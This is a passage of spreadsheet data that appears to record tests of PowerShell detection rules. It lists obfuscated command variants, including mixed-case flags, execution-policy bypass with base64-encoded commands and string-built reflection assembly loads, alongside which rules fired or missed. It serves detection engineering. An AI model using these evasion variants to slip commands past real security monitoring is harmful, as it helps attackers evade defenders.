        </is>
      </c>
      <c r="C760" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D760" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E760" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F760" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G760" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H760" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I760" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J760" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K760" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="761" ht="15.75" customHeight="1" s="42">
      <c r="A761" s="43" t="n"/>
      <c r="B761" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C761" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D761" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E761" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmAnD "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F761" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G761" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H761" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I761" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J761" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K761" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="762" ht="15.75" customHeight="1" s="42">
      <c r="A762" s="43" t="n"/>
      <c r="B762" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C762" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D762" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E762" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMmaNd "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F762" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G762" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H762" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I762" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J762" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K762" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="763" ht="15.75" customHeight="1" s="42">
      <c r="A763" s="43" t="n"/>
      <c r="B763" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C763" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D763" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E763" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F763" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G763" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H763" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I763" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J763" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K763" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="764" ht="15.75" customHeight="1" s="42">
      <c r="A764" s="43" t="n"/>
      <c r="B764" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C764" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D764" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E764" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmMaND "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F764" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G764" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H764" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I764" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J764" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K764" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="765" ht="15.75" customHeight="1" s="42">
      <c r="A765" s="43" t="n"/>
      <c r="B765" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C765" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D765" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E765" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmAnD "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F765" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G765" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H765" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I765" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J765" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K765" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="766" ht="15.75" customHeight="1" s="42">
      <c r="A766" s="43" t="n"/>
      <c r="B766" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C766" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D766" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E766" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAnD "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F766" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G766" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H766" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I766" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J766" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K766" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="767" ht="15.75" customHeight="1" s="42">
      <c r="A767" s="43" t="n"/>
      <c r="B767" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C767" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D767" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E767" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmaND "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F767" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G767" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H767" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I767" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J767" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K767" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="768" ht="15.75" customHeight="1" s="42">
      <c r="A768" s="43" t="n"/>
      <c r="B768" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C768" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D768" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E768" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -e aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F768" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G768" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H768" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I768" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J768" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K768" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="769" ht="15.75" customHeight="1" s="42">
      <c r="A769" s="43" t="n"/>
      <c r="B769" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C769" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D769" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E769" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -E aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F769" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G769" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H769" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I769" s="36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769" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K769" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="770" ht="15.75" customHeight="1" s="42">
      <c r="A770" s="43" t="n"/>
      <c r="B770" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C770" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D770" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E770" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -e aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F770" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G770" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H770" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I770" s="36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770" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K770" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="771" ht="15.75" customHeight="1" s="42">
      <c r="A771" s="43" t="n"/>
      <c r="B771" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C771" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D771" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E771" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eXEcuTiOnPOLIcY Bypass -e aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F771" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G771" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H771" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I771" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J771" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K771" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="772" ht="15.75" customHeight="1" s="42">
      <c r="A772" s="43" t="n"/>
      <c r="B772" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C772" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D772" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E772" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /e SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F772" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G772" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H772" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I772" s="43" t="n"/>
      <c r="J772" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K772" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="773" ht="15.75" customHeight="1" s="42">
      <c r="A773" s="43" t="n"/>
      <c r="B773" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C773" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D773" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E773" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /E SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F773" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G773" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H773" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I773" s="43" t="n"/>
      <c r="J773" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K773" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="774" ht="15.75" customHeight="1" s="42">
      <c r="A774" s="43" t="n"/>
      <c r="B774" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C774" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D774" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E774" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$m = 'Load'; [Reflection.Assembly]::$m.Invoke($data)"</t>
        </is>
      </c>
      <c r="F774" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G774" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H774" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I774" s="43" t="n"/>
      <c r="J774" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K774" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="775" ht="15.75" customHeight="1" s="42">
      <c r="A775" s="43" t="n"/>
      <c r="B775" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C775" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D775" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E775" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$m = 'Load'; [Reflection.Assembly]::$m.Invoke($data)"</t>
        </is>
      </c>
      <c r="F775" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G775" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H775" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I775" s="43" t="n"/>
      <c r="J775" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K775" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="776" ht="15.75" customHeight="1" s="42">
      <c r="A776" s="43" t="n"/>
      <c r="B776" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C776" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D776" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E776" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmanD "$m = 'Load'; [Reflection.Assembly]::$m.Invoke($data)"</t>
        </is>
      </c>
      <c r="F776" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G776" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H776" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I776" s="43" t="n"/>
      <c r="J776" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K776" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="777" ht="15.75" customHeight="1" s="42">
      <c r="A777" s="43" t="n"/>
      <c r="B777" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C777" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D777" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E777" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMand "$m = 'Load'; [Reflection.Assembly]::$m.Invoke($data)"</t>
        </is>
      </c>
      <c r="F777" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G777" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H777" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I777" s="43" t="n"/>
      <c r="J777" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K777" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="778" ht="15.75" customHeight="1" s="42">
      <c r="A778" s="43" t="n"/>
      <c r="B778" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C778" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D778" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E778" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAND "$m = 'Load'; [Reflection.Assembly]::$m.Invoke($data)"</t>
        </is>
      </c>
      <c r="F778" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G778" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H778" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I778" s="43" t="n"/>
      <c r="J778" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K778" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="779" ht="15.75" customHeight="1" s="42">
      <c r="A779" s="43" t="n"/>
      <c r="B779" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C779" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D779" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E779" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Reflection.Assembly]::('L'+'o'+'ad').Invoke($data)"</t>
        </is>
      </c>
      <c r="F779" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G779" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H779" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I779" s="43" t="n"/>
      <c r="J779" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K779" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="780" ht="15.75" customHeight="1" s="42">
      <c r="A780" s="43" t="n"/>
      <c r="B780" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C780" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D780" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E780" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "[Reflection.Assembly]::('L'+'o'+'ad').Invoke($data)"</t>
        </is>
      </c>
      <c r="F780" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G780" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H780" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I780" s="43" t="n"/>
      <c r="J780" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K780" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="781" ht="15.75" customHeight="1" s="42">
      <c r="A781" s="43" t="n"/>
      <c r="B781" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C781" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D781" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E781" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMManD "[Reflection.Assembly]::('L'+'o'+'ad').Invoke($data)"</t>
        </is>
      </c>
      <c r="F781" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G781" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H781" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I781" s="43" t="n"/>
      <c r="J781" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K781" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="782" ht="15.75" customHeight="1" s="42">
      <c r="A782" s="43" t="n"/>
      <c r="B782" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C782" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D782" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E782" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CommaND "[Reflection.Assembly]::('L'+'o'+'ad').Invoke($data)"</t>
        </is>
      </c>
      <c r="F782" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G782" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H782" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I782" s="43" t="n"/>
      <c r="J782" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K782" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="783" ht="15.75" customHeight="1" s="42">
      <c r="A783" s="43" t="n"/>
      <c r="B783" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C783" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D783" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E783" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -command "[Reflection.Assembly]::('L'+'o'+'ad').Invoke($data)"</t>
        </is>
      </c>
      <c r="F783" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G783" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H783" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I783" s="43" t="n"/>
      <c r="J783" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K783" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="784" ht="15.75" customHeight="1" s="42">
      <c r="A784" s="43" t="n"/>
      <c r="B784" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C784" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D784" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E784" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$w='Win32\_'; $p='Process'; Get-CimInstance -ClassName ($w+$p)"</t>
        </is>
      </c>
      <c r="F784" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G784" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H784" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I784" s="43" t="n"/>
      <c r="J784" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K784" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="785" ht="15.75" customHeight="1" s="42">
      <c r="A785" s="43" t="n"/>
      <c r="B785" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C785" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D785" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E785" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMmANd "$w='Win32\_'; $p='Process'; Get-CimInstance -ClassName ($w+$p)"</t>
        </is>
      </c>
      <c r="F785" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G785" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H785" s="36" t="b">
        <v>1</v>
